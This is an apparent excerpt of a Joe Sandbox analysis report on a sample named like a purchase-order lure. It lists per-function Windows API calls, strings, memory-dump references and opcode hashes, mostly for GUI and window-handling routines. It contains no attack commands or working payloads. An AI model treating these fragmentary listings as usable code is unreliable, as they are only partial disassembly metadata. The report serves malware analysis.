GetPixel.GDI32(00000000,00000000,?), ref: 0044A2B4
GetPixel.GDI32(00000000,?,?), ref: 0044A2D0
ReleaseDC.USER32(?,00000000), ref: 0044A2D8
SetTextColor.GDI32(00000000,?), ref: 0044A2F6
SetBkMode.GDI32(00000000,00000001), ref: 0044A30A
GetStockObject.GDI32(00000005), ref: 0044A312
SetBkColor.GDI32(00000000,00000000), ref: 0044A328

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: Color$Pixel$Window$Release$ClientLongMessageModeObjectRectSendStockText
String ID:
API String ID: 1744303182-0
Opcode ID: c697551d262e08263a45fd1ab6b47457a8b4de30e4a023901e5f3e03e0b3260a
Instruction ID: f407f88e1fc9bdd08975b2e96734b256c85d8f08b0ead5e1f8dbf5832e348edb
Opcode Fuzzy Hash: c697551d262e08263a45fd1ab6b47457a8b4de30e4a023901e5f3e03e0b3260a
Instruction Fuzzy Hash: AD6148315442016BE3209B388C88BBFB7A4FB49324F54079EF9A8973D0D7B99C51D76A

Function 0046884B Relevance: 31.6, APIs: 6, Strings: 12, Instructions: 113COMMON

Download Yara Rule

APIs

__wcsicoll.LIBCMT ref: 0046887D
__wcsicoll.LIBCMT ref: 00468895
__wcsnicmp.LIBCMT ref: 004688B5

Strings

REGEXP=, xrefs: 004688D9
[REGEXPTITLE:, xrefs: 004688EB
[CLASS:, xrefs: 00468915
ALL, xrefs: 00468959
[ALL, xrefs: 0046896B
[HANDLE:, xrefs: 004688C1
CLASSNAME=, xrefs: 00468903
HANDLE=, xrefs: 004688AF
ACTIVE, xrefs: 0046888F
LAST, xrefs: 00468877
[ACTIVE, xrefs: 004688A1
[LAST, xrefs: 00468972

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: __wcsicoll$__wcsnicmp
String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
API String ID: 790654849-1810252412
Opcode ID: 3ef763bd77a89c14e9ef14da431a542ecfa9ee53dca0875bc5fd58ba0035de2e
Instruction ID: 1b62209f2aa4de5792947d5a3aa61dcd1c874d3672784017b8f4b2c72f71c34c
Opcode Fuzzy Hash: 3ef763bd77a89c14e9ef14da431a542ecfa9ee53dca0875bc5fd58ba0035de2e
Instruction Fuzzy Hash: 7A3193B1644301A7CA00FA61DC83F5B73A85F54759F100A3FB955B61D6FA6CEA0C862F

Function 00476A8A Relevance: 27.3, APIs: 18, Instructions: 332COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00476AA0

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: InitVariant
String ID:
API String ID: 1927566239-0
Opcode ID: 0ce8a0180f427c6633dd7a645a706da8f2470da33a28fd12fcc8bbcffff15558
Instruction ID: b17386a2766a1a739d91313a8bf0106a5dd250ff49ec0cac6ee5761d63536315
Opcode Fuzzy Hash: 0ce8a0180f427c6633dd7a645a706da8f2470da33a28fd12fcc8bbcffff15558
Instruction Fuzzy Hash: 87A1F5766146019FC300EF65D88499FB7AAFF85315F408D3EFA49C3211D77AD4098BAA

Function 0046D6EB Relevance: 26.7, APIs: 6, Strings: 9, Instructions: 474COMMON

Download Yara Rule

APIs

Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2

GetForegroundWindow.USER32(?,?), ref: 0046D7C1
GetForegroundWindow.USER32 ref: 0046DBA4
IsWindow.USER32(?), ref: 0046DBDE
GetDesktopWindow.USER32 ref: 0046DCB5
EnumChildWindows.USER32(00000000), ref: 0046DCBC
EnumWindows.USER32(00460772,?), ref: 0046DCC4

Part of subcall function 00445975: _wcslen.LIBCMT ref: 00445984

Strings

HANDLE, xrefs: 0046D8A4
ALL, xrefs: 0046DA95
REGEXPCLASS, xrefs: 0046D95E
CLASS, xrefs: 0046D92F
ACTIVE, xrefs: 0046D88A
REGEXPTITLE, xrefs: 0046D8BE
LAST, xrefs: 0046D870
INSTANCE, xrefs: 0046DA63
TITLE, xrefs: 0046DACA

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: Window$EnumForegroundWindows_wcslen$ChildDesktop
String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
API String ID: 1322021666-1919597938
Opcode ID: f0ae0bd5c84c8fbd9fa80e8b17a650ade3f6139d63811c55da114ce2128ba9af
Instruction ID: 252cd24da08a8cddfda52e39780f3f39bafd894638fb43d2866a45805a666b3e
Opcode Fuzzy Hash: f0ae0bd5c84c8fbd9fa80e8b17a650ade3f6139d63811c55da114ce2128ba9af
Instruction Fuzzy Hash: 96F1C571D143409BCB00EF61C881EAB73A4BF95308F44496FF9456B286E77DE909CB6A

Function 0043737D Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 83windowCOMMON

Download Yara Rule

APIs

__wcsicoll.LIBCMT ref: 0043739E
__wcsicoll.LIBCMT ref: 00437451
LoadIconW.USER32(00000000,00007F04), ref: 00437467

Strings

blank, xrefs: 00437398
question, xrefs: 004373BD
stop, xrefs: 004373E0
warning, xrefs: 00437403
info, xrefs: 0043744B

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: __wcsicoll$IconLoad
String ID: blank$info$question$stop$warning
API String ID: 2485277191-404129466
Opcode ID: 5bed60ec3368b378429e4d7d86c3e9ed6cb6a0c6f582f3c961ebbe10ae210b10
Instruction ID: 3fdcc892c2a25cebf9aff257507665a297d4e16c4260cb8f6e9492a672fb13e0
Opcode Fuzzy Hash: 5bed60ec3368b378429e4d7d86c3e9ed6cb6a0c6f582f3c961ebbe10ae210b10
Instruction Fuzzy Hash: CB2128B6B08301A7D610A725BC05FDF27489FA8365F004C2BF941E2283F3A8A45583BD

Function 00428604 Relevance: 25.8, APIs: 17, Instructions: 306stringCOMMON

Download Yara Rule

APIs

CompareStringW.KERNEL32(?,?,004832AC,00000001,004832AC,00000001), ref: 00428611
GetLastError.KERNEL32(?,?,004832AC,00000001,004832AC,00000001), ref: 00428627
strncnt.LIBCMT ref: 00428646
strncnt.LIBCMT ref: 0042865A

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: strncnt$CompareErrorLastString
String ID:
API String ID: 1776594460-0
Opcode ID: 16ce8c3a65625fd7540c51b5c1254bfa478756f7f63d0819a38d9cd03b2976a4
Instruction ID: 056e5a993d73ec50dc3c8e072878bb631c9b69e1f80941a2a69bbd8adeb14d7f
Opcode Fuzzy Hash: 16ce8c3a65625fd7540c51b5c1254bfa478756f7f63d0819a38d9cd03b2976a4
Instruction Fuzzy Hash: 0DA1B131B01225AFDF219F61EC41AAF7BB6AF94340FA4402FF81196251DF3D8891CB58

Function 004545C9 Relevance: 25.7, APIs: 17, Instructions: 198windowtimeCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(?,00000063), ref: 004545DA
SendMessageW.USER32(?,00000080,00000000,00000000), ref: 004545EC
SetWindowTextW.USER32(?,?), ref: 00454606
GetDlgItem.USER32(?,000003EA), ref: 0045461F
SetWindowTextW.USER32(00000000,?), ref: 00454626
GetDlgItem.USER32(?,000003E9), ref: 00454637
SetWindowTextW.USER32(00000000,?), ref: 0045463E
SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00454663
SendDlgItemMessageW.USER32(?,000003E9,000000C5,?,00000000), ref: 0045467D
GetWindowRect.USER32(?,?), ref: 00454688
SetWindowTextW.USER32(?,?), ref: 004546FD
GetDesktopWindow.USER32 ref: 00454708
GetWindowRect.USER32(00000000), ref: 0045470F
MoveWindow.USER32(?,?,00000000,?,?,00000000), ref: 00454760
GetClientRect.USER32(?,?), ref: 0045476F
PostMessageW.USER32(?,00000005,00000000,?), ref: 0045479E
SetTimer.USER32(?,0000040A,?,00000000), ref: 004547E9

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
String ID:
API String ID: 3869813825-0
Opcode ID: d6d25c813e590b752cbfd9858452ff05e3d443d6a6ce6916d89e520ab15b373f
Instruction ID: 4e77de65cc6986e78e6be143d0a4b9e7f39e78804b6f4fc71fe9e35dfcfd5046
Opcode Fuzzy Hash: d6d25c813e590b752cbfd9858452ff05e3d443d6a6ce6916d89e520ab15b373f
Instruction Fuzzy Hash: 8C616D71604701AFD320DF68CD88F2BB7E8AB88709F004E1DF98697691D7B8E849CB55

Function 00458D1C Relevance: 25.6, APIs: 17, Instructions: 112COMMON

Download Yara Rule

APIs

LoadCursorW.USER32(00000000,00007F8A), ref: 00458D2D
LoadCursorW.USER32(00000000,00007F00), ref: 00458D3A
LoadCursorW.USER32(00000000,00007F03), ref: 00458D47
LoadCursorW.USER32(00000000,00007F8B), ref: 00458D54
LoadCursorW.USER32(00000000,00007F01), ref: 00458D61
LoadCursorW.USER32(00000000,00007F81), ref: 00458D6E
LoadCursorW.USER32(00000000,00007F88), ref: 00458D7B
LoadCursorW.USER32(00000000,00007F80), ref: 00458D88
LoadCursorW.USER32(00000000,00007F86), ref: 00458D95
LoadCursorW.USER32(00000000,00007F83), ref: 00458DA2
LoadCursorW.USER32(00000000,00007F85), ref: 00458DAF
LoadCursorW.USER32(00000000,00007F82), ref: 00458DBC
LoadCursorW.USER32(00000000,00007F84), ref: 00458DC9
LoadCursorW.USER32(00000000,00007F04), ref: 00458DD6
LoadCursorW.USER32(00000000,00007F02), ref: 00458DE3
LoadCursorW.USER32(00000000,00007F89), ref: 00458DF0
GetCursorInfo.USER32 ref: 00458E03

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: Cursor$Load$Info
String ID:
API String ID: 2577412497-0
Opcode ID: 0c78b259ae472df09145ddf792cd37f85d2c816b82f1d484569203a38ef646a1
Instruction ID: 36b4ee280ed0253346847529aeb00c95e660e1b7f2a6688567eec4957a26740b
Opcode Fuzzy Hash: 0c78b259ae472df09145ddf792cd37f85d2c816b82f1d484569203a38ef646a1
Instruction Fuzzy Hash: D9311671E4C3156AE7509F758C5AB1BBEE0AF40B54F004D2FF2889F2D1DAB9E4448B86

Function 00469681 Relevance: 24.8, APIs: 13, Strings: 1, Instructions: 253windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000112,0000F060,00000000), ref: 004696CC
GetFocus.USER32 ref: 004696E0
GetDlgCtrlID.USER32(00000000), ref: 004696EB
PostMessageW.USER32(?,00000111,?,00000000), ref: 0046973F

Strings

0, xrefs: 00469842

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: MessagePost$CtrlFocus
String ID: 0
API String ID: 1534620443-4108050209
Opcode ID: e5c32c991b5ca6252707de8ebf482154a45a931f584edf505bd4e03ae59cba12
Instruction ID: 7d80af5808d25915b866e76daf530f36ef8b085de22dc1c7fc8dbb607ae8adb7
Opcode Fuzzy Hash: e5c32c991b5ca6252707de8ebf482154a45a931f584edf505bd4e03ae59cba12
Instruction Fuzzy Hash: 1591E1B1604301ABD710DF14D884BABB7A8FB89714F004A1EF99497391E7B4DC49CBAB

Function 004680EB Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 204windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00468107
GetMenuItemInfoW.USER32(?,00000007,00000000,?), ref: 00468190
GetMenuItemCount.USER32(?), ref: 00468227
DeleteMenu.USER32(?,00000005,00000000), ref: 004682B8
DeleteMenu.USER32(?,00000004,00000000), ref: 004682C1
DeleteMenu.USER32(?,00000006,00000000,?,00000004,00000000), ref: 004682CA
DeleteMenu.USER32(00000000,00000003,00000000,?,00000006,00000000,?,00000004,00000000), ref: 004682D3
GetMenuItemCount.USER32 ref: 004682DC
SetMenuItemInfoW.USER32 ref: 00468317
GetCursorPos.USER32(00000000), ref: 00468322
SetForegroundWindow.USER32(?), ref: 0046832D
TrackPopupMenuEx.USER32(?,00000000,00000000,00000006,?,00000000,?,?,00000006,00000000,?,00000004,00000000), ref: 00468345
PostMessageW.USER32(?,00000000,00000000,00000000), ref: 00468352

Strings

0, xrefs: 004680FF

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
String ID: 0
API String ID: 3993528054-4108050209
Opcode ID: d5573be1ba1a613c106f8e764602a2d45d8b266f51cd1eb04f60dea375430468
Instruction ID: a450cccb4b36e122d1eca3afa35c85d1e57e2007e4dd5bc50ce81cada7f4397f
Opcode Fuzzy Hash: d5573be1ba1a613c106f8e764602a2d45d8b266f51cd1eb04f60dea375430468
Instruction Fuzzy Hash: 3C71C070648301ABE3309B14CC49F5BB7E8BF86724F244B0EF5A5563D1DBB9A8458B1B

Function 0046F2B0 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 185windowfileCOMMON

Download Yara Rule

APIs

DragQueryPoint.SHELL32(?,?), ref: 0046F2DA

Part of subcall function 00441CB4: ClientToScreen.USER32(00000000,?), ref: 00441CDE
Part of subcall function 00441CB4: GetWindowRect.USER32(?,?), ref: 00441D5A
Part of subcall function 00441CB4: PtInRect.USER32(?,?,?), ref: 00441D6F

SendMessageW.USER32(?), ref: 0046F34C
DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0046F355
DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0046F37F
_wcscat.LIBCMT ref: 0046F3BC
SendMessageW.USER32(?,000000C2,00000001,?), ref: 0046F3D1
SendMessageW.USER32(?,000000B0,?,?), ref: 0046F3E3
SendMessageW.USER32(?,000000B1,?,?), ref: 0046F3F1
SendMessageW.USER32(?,000000B1,?,?), ref: 0046F40E
DragFinish.SHELL32(?), ref: 0046F414
DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0046F4FC

Strings

@GUI_DRAGID, xrefs: 0046F46E
@GUI_DROPID, xrefs: 0046F43A
@GUI_DRAGFILE, xrefs: 0046F4AA

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: MessageSend$Drag$Query$FileRect$ClientFinishPointProcScreenWindow_wcscat
String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
API String ID: 4085615965-3440237614
Opcode ID: e6dc8860684545ee98a9b737372e313d8034606243f87d3f07a4344f64e9a130
Instruction ID: d92027b63b9478c52a8b17f069484fb886a707b260a555cedefccfc898d4b85d
Opcode Fuzzy Hash: e6dc8860684545ee98a9b737372e313d8034606243f87d3f07a4344f64e9a130
Instruction Fuzzy Hash: 596170716043009BD700EF54D885E5FB7A8FFC9714F104A2EF99097291D7B8A949CBAA

Function 0044B988 Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 73COMMON

Download Yara Rule

APIs

__wcsicoll.LIBCMT ref: 0044B99D
__wcsicoll.LIBCMT ref: 0044B9B3
__wcsicoll.LIBCMT ref: 0044BA41

Strings

MENU, xrefs: 0044B9EA
MAIN, xrefs: 0044B9C6
MIDDLE, xrefs: 0044BA3B
PRIMARY, xrefs: 0044B9D8
RIGHT, xrefs: 0044B9AD
SECONDARY, xrefs: 0044B9FC
LEFT, xrefs: 0044B997

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: __wcsicoll
String ID: LEFT$MAIN$MENU$MIDDLE$PRIMARY$RIGHT$SECONDARY
API String ID: 3832890014-4202584635
Opcode ID: 3f0b73fdde0a53fb0a00575eab05b85141dd4a2dcfcc4ab19f269ee93bd0b8a8
Instruction ID: bf73cd225697d97a5a257e466bf5c8c79b4efa22739c650e03c6b1f9c6e9338c
Opcode Fuzzy Hash: 3f0b73fdde0a53fb0a00575eab05b85141dd4a2dcfcc4ab19f269ee93bd0b8a8
Instruction Fuzzy Hash: 1D01616160562122FE11322A7C03BDF15898F5139AF14447BFC05F1282FF4DDA8692EE

Function 00466999 Relevance: 23.1, APIs: 11, Strings: 2, Instructions: 312COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 004669C4
_wcsncpy.LIBCMT ref: 00466A21
_wcsncpy.LIBCMT ref: 00466A4D

Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012

_wcstok.LIBCMT ref: 00466A90

Part of subcall function 004142A3: __getptd.LIBCMT ref: 004142A9

_wcstok.LIBCMT ref: 00466B3F
_wcscpy.LIBCMT ref: 00466BC8
GetOpenFileNameW.COMDLG32(00000058), ref: 00466CFE
_wcslen.LIBCMT ref: 00466D1D
_memset.LIBCMT ref: 00466BEE

Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2

_wcslen.LIBCMT ref: 00466D4B
GetSaveFileNameW.COMDLG32(00000058), ref: 00466D9E

Strings

X, xrefs: 00466C1D
HH, xrefs: 004669F3

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: _wcslen$FileName_memset_wcscpy_wcsncpy_wcstok$OpenSave__getptd
String ID: X$HH
API String ID: 3021350936-1944015008
Opcode ID: b06cb37d3db4ad53d3a41f94d3d7a052046d00add24c9c6de48b5fd017d77e84
Instruction ID: 73e83d7ea4d12cbe09e247b0b8120e99e9ae8af51722f6ce2f45a1bbad6557a4
Opcode Fuzzy Hash: b06cb37d3db4ad53d3a41f94d3d7a052046d00add24c9c6de48b5fd017d77e84
Instruction Fuzzy Hash: D1C1B2715043408BC714EF65C981A9FB3E4BF84304F15892FF949AB292EB78E905CB9B

Function 0045F48E Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 226windowsleepCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0045F4AE
GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0045F519
SetMenuItemInfoW.USER32(00000008,00000004,00000000,?), ref: 0045F556
Sleep.KERNEL32(000001F4,?,?,00000000,?), ref: 0045F568

Strings

0, xrefs: 0045F4A6

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: InfoItemMenu$Sleep_memset
String ID: 0
API String ID: 1504565804-4108050209
Opcode ID: b2eb264578549714347dca4c6cc1c63db220fd8d89572d1a81e0d1d82c6caf25
Instruction ID: 9e8996cb251b45e9fd8013479734a73363ce4640cf951279a7d2fdadd0934edb
Opcode Fuzzy Hash: b2eb264578549714347dca4c6cc1c63db220fd8d89572d1a81e0d1d82c6caf25
Instruction Fuzzy Hash: E171E3711043406BD3109F54DD48FABBBE8EBD5306F04086FFD8587252D6B9A94EC76A

Function 004556F8 Relevance: 23.0, APIs: 11, Strings: 2, Instructions: 216COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,004A83D8,?), ref: 00455800
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00400000,00000000), ref: 00455847

Strings

tooltips_class32, xrefs: 00455840, 0045591F
,, xrefs: 004557A5

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
